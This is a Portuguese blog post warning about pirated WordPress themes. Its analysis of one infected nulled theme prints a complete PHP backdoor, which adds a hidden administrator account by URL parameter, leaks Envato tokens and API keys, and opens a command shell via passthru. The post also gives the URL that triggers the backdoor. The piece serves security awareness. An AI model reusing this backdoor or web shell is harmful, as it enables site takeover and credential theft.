Os riscos de utilizar um tema pirata no seu site

⚠ PERIGO! Os riscos de utilizar um tema pirata no seu site

Escrito por

terça-feira, 23 de janeiro de 2018 | Comentários

Então você quer criar um site e a primeira coisa que você pensa é: Qual será o layout? Muitas ideias já começam a aparecer, não é mesmo? É importante buscar por modelos de layout e temas que tenham a ver com a proposta da marca, e não é difícil encontrar uma boa referência na internet.

Você não precisa procurar muito na web para encontrar sites que oferecem templates pagos de modo gratuito para CMS como o WordPress, por exemplo, você pode encontrar um tema pirata muito rápido e na maioria das vezes eles funcionam perfeitamente, ou melhor, parece que funcionam.

Quais são os riscos?

As versões originais de plugins e temas do WordPress, por exemplo, são bastante seguras pois possuem atualizações recorrentes. Já um tema pirata apresenta diversas ameaças para o seu site, entre elas:

  • Possui código comprometido ou malicioso
    Os temas piratas muitas vezes estão com o código comprometido, o que pode tornar o seu site em uma fonte de spam e propagação de um vírus. Além disso, um tema pirata pode conter um código malicioso que oferece um backdoor para hackers terem acesso total aos seus dados (e dos seus clientes também).
  • Possui versão desatualizada
    As atualizações dos temas e plugins são realizadas para reduzir vulnerabilidades de segurança e oferecer ao usuário uma nova versão com correção das falhas. Quando você utiliza um tema ou plugin desatualizado, as brechas de segurança são conhecidas e aproveitadas pelos hackers para infectar o site.
  • Prejudica no posicionamento no Google
    Como os temas piratas contêm informações prejudiciais no código, muitos desses conteúdos escondidos são detectados pelo Google e considerados ruins, o que interfere no posicionamento do seu site no mecanismo de busca e pode resultar numa punição também.

Instalar softwares de origem desconhecida também prejudica seu site tornando ele uma fonte de envio em massa de spam – o que deixa com baixa reputação na internet, instalação de phishing – que pode gerar alertas para qualquer um que acesso seu site, a famosa “tela vermelha do Google” e também a perda total dos seus arquivos, posts e configurações do site.

Seu ‘fornecedor’ pirata vai te ajudar?

Receber suporte dos desenvolvedores de um tema é algo que agrega valor na compra de um tema WordPress, e isso é algo que você não tem ao usar uma versão pirata. Quando você utiliza um tema pirata, não há nenhum tipo de garantia caso algo de errado ocorra, como invasões, por exemplo. Além disso, muitos temas pagos possuem garantia e reembolso, caso você não esteja insatisfeito.

O que posso encontrar no meu site ao instalar um tema pirata?

Para simular e demonstrar os danos de utilizar as versões piratas, vou realizar uma análise baixando um arquivo e realizar a instalação em um ambiente de testes.

Lembre-se: O tema original pago não apresenta nenhum problema e pode ser usado com toda segurança, para a demonstração utilizei uma versão disponibilizada de forma gratuita na internet para conferir os impactos.

Descompactei os arquivos e realizei um scan com nosso antivírus para conferir as ameaças. Veja abaixo quais foram os malwares encontrados:

./class.theme-modules.php
./inc/admin/envato_setup/child-theme/class.theme-modules.php
./inc/admin/advanced/functions/class.theme-modules.php

Esses arquivos servem para varrer o seu WordPress na hora da instalação do tema e instalar vários backdoors para comando do invasor. Veja o resultado do scan após a instalação:

wp-content/themes/twentyseventeen/functions.php
wp-content/themes/twentyfifteen/functions.php
wp-content/themes/twentysixteen/functions.php
wp-content/themes/flatsome/inc/admin/envato_setup/child-theme/class.theme-modules.php
wp-content/themes/flatsome/functions.php

Vemos acima que todos os arquivos functions.php de todos os temas instalados foram infectados, essa infecção é um backdoor que nesta variação é utilizado para infectar o arquivo class.wp.php com o conteúdo abaixo:

<?php

error_reporting(0);
require $_SERVER[‘DOCUMENT_ROOT’].’/wp-load.php’;
$table_name = $wpdb->get_blog_prefix();
$sample = ‘a:1:{s:13:”administrator”;b:1;}’;
if( isset($_GET[‘ok’]) ) { echo ‘<!– Silence is golden. –>’;}
if( isset($_GET[‘awu’]) ) {
$wpdb->query(“INSERT INTO $wpdb->users (`ID`, `user_login`, `user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `user_status`, `display_name`) VALUES (‘1001010’, ‘1001010’, ‘\$P\$B3PJXeorEqVMl//L3H5xFX1Uc0t5870’, ‘1001010’, ‘[email protected]’, ”, ‘2011-06-07 00:00:00’, ”, ‘0’, ‘1001010’);”);
$wpdb->query(“INSERT INTO $wpdb->usermeta (`umeta_id`, `user_id`, `meta_key`, `meta_value`) VALUES (1001010, ‘1001010’, ‘{$table_name}capabilities’, ‘{$sample}’);”);
$wpdb->query(“INSERT INTO $wpdb->usermeta (`umeta_id`, `user_id`, `meta_key`, `meta_value`) VALUES (NULL, ‘1001010’, ‘{$table_name}user_level’, ’10’);”); }
if( isset($_GET[‘dwu’]) ) { $wpdb->query(“DELETE FROM $wpdb->users WHERE `ID` = 1001010”);
$wpdb->query(“DELETE FROM $wpdb->usermeta WHERE $wpdb->usermeta.`umeta_id` = 1001010”);}
if( isset($_GET[‘key’]) ) { $options = get_option( EWPT_PLUGIN_SLUG ); echo ‘<center><h2>’; echo esc_html( envato_market()->get_option( ‘token’ ) ); echo ‘<br />’; echo esc_attr( $options[‘user_name’] . ‘:’ . esc_attr( $options[‘api_key’])); echo ‘</center></h2>’; }
if( isset($_GET[‘console’]) ) {function MakeSimpleForm() { ?> <form method=’GET’ action='<?=$_SERVER[‘PHP_SELF’]?>’>
<input type=text name=’cmd’> <input type=submit name=’exec’ value=’ok’> </form> <? } function DoCmd($cmd) { ?>
<textarea rows=30 cols=80><?=passthru($cmd)?></textarea><br> <? } if ( isset($_REQUEST[‘exec’]) && isset($_REQUEST[‘cmd’]))
DoCmd($_REQUEST[‘cmd’]); else MakeSimpleForm();}?>

O código acima permite que seja inserido um usuário no WordPress com direitos de administrador adicionando parâmetros na url:

dominioteste/wp-includes/class.wp.php?awu

awu: Add WordPress user

Com isso é criado um usuário administrador no site que dará controle total ao invasor. Por isso é importante instalar temas e plugins originais em seu site para que sempre esteja seguro e livre dessas ameaças.

Onde encontrar temas originais e seguros?

Não é todos os temas gratis que trazem riscos, o principal é saber onde você está conseguindo esses tema e saber se o site é de confiança. Você pode adquirir temas e plugins no diretório oficial do WordPress, como também pode conferir nossas dicas de Temas Gratuitos para WordPress.

Tenha bastante cuidado em todos os recursos que você utiliza em seu site. Preze pela sua segurança e de todos na internet.

Tags:, , ,
Comentários
Pressione Enter para pesquisar ou ESC para fechar